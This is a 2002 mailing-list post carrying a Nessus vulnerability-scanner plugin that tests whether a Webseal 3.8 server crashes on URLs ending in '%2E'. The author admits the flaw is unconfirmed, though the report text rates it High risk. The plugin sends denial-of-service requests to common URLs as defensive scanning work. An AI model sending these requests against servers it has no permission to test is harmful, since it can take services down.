
List:       nessus-plugins-writers
Subject:    Webseal denial of service
From:       "Michel Arboi" <arboi () noos ! fr>
Date:       2002-08-17 11:16:56
Message-ID: 1029583016.6746.11.camel () rotissoire

I don't have any Webseal here, I am not even sure that the flaw exists
:-\







# This script was written by Michel Arboi <arboi@bigfoot.com>
#
# GPL
#
# References:
# Date:  11 Dec 2001 09:22:50 -0000
# From: "Matthew Lane" <MatthewL@Janusassociates.com>
# To: bugtraq@securityfocus.com
# Subject: Webseal 3.8
#
# Affected:
# Webseal 3.8
#
# *unconfirmed*

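# Registration block: when the scanner loads the plugin with `description`
# set, only the metadata below is declared and the script exits before the
# active test further down is reached.
if(description)
{
 script_id(11089);
 script_version ("$Revision$");
 
 name["english"] = "Webseal denial of service";
 name["francais"] = "Déni de service contre Webseal";
 script_name(english:name["english"],
	      francais:name["francais"]);
 
 # NOTE(review): the file header marks this flaw as *unconfirmed*, but the
 # report text below states it as fact with a High risk factor - confirm
 # against an affected Webseal before relying on a positive result.
 desc["english"] = "
The remote web server dies when an URL ending with %2E is requested.

A cracker may use this flaw to make your server crash continually.

Solution : upgrade your server or firewall it.
Risk factor : High"; 


 desc["francais"] = "
Le serveur web distant meurt quand on demande une URL qui se termine
par %2E

Un pirate pourrait utiliser cette faille pour tuer régulièrement
votre serveur.

Solution : mettez votre logiciel à jour ou protégez-le

Facteur de risque : Elevé";

 script_description(english:desc["english"],
		      francais:desc["francais"]);
		    
 
 summary["english"] = "Request ending with %2E kills WebSeal"; 
 summary["francais"] = "Une requête qui se termine par %2E tue WebSeal";
 script_summary(english:summary["english"],
		  francais:summary["francais"]);
 
 # ACT_DENIAL declares that the test may take the target service down, so
 # the scanner can schedule or skip it accordingly.
 script_category(ACT_DENIAL);
 
 script_copyright(english:"This script is Copyright (C) 2002 Michel Arboi",
		   francais:"Ce script est Copyright (C) 2002 Michel Arboi");
 
 # Fix: the family name had a trailing space ("Denial of Service "), which
 # would file this plugin under a family of its own instead of grouping it
 # with the other denial-of-service checks.
 family["english"] = "Denial of Service";
 family["francais"] = "Déni de service";
 script_family(english:family["english"], francais:family["francais"]);
 # Service detection and HTTP version detection are declared as
 # prerequisites; the test itself needs a web port (KB entry or 80).
 script_dependencie("find_service.nes", "httpver.nasl");
 script_require_ports("Services/www", 80);
 exit(0);
}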

#

include("http_func.inc");

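# Active test: request a few common URLs with "%2E" appended and report the
# port if the web server stops answering afterwards. Detection is purely
# availability-based (no banner or version check), so a positive result
# should be confirmed by hand.

# Use the web port found by service detection, else fall back to 80.
port = get_kb_item("Services/www");
if(!port) port = 80;

if (! get_port_state(port)) exit(0);

# Baseline: only test a server that answers HTTP right now. Without this, a
# server that accepts TCP connections but was already hung would be reported
# as crashed by this check (false positive). This is done before `soc` is
# opened so the helper cannot interfere with the socket used below.
# NOTE(review): http_is_alive() presumably comes from http_func.inc and
# issues its own request - confirm.
if (! http_is_alive(port)) exit(0);

soc = open_sock_tcp(port);
if (! soc) exit(0);

# Candidate resources; the loop bound below must match the number of entries.
url[0] = "/index.html";
url[1] = "/index.htm";
url[2] = "/index.asp";
url[3] = "/";

for (i=0; i<4;i=i+1)
{
 req = http_get(port: port, item: string(url[i], "%2E"));
 send(socket: soc, data: req);
 # The reply content is not inspected; reading only gives the server time
 # to process the request before the connection is dropped.
 r = recv(socket: soc, length: 4096);
 close(soc);
 sleep(1);

 # A refused reconnect right after the request is treated as a crash.
 soc = open_sock_tcp(port);
 if (! soc) { security_hole(port); exit(0); }
}

# Release the last socket and give a slow crash time to show up before the
# final liveness check.
sleep(1);
close(soc);
sleep(1);

if (! http_is_alive(port)) { security_hole(port); }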
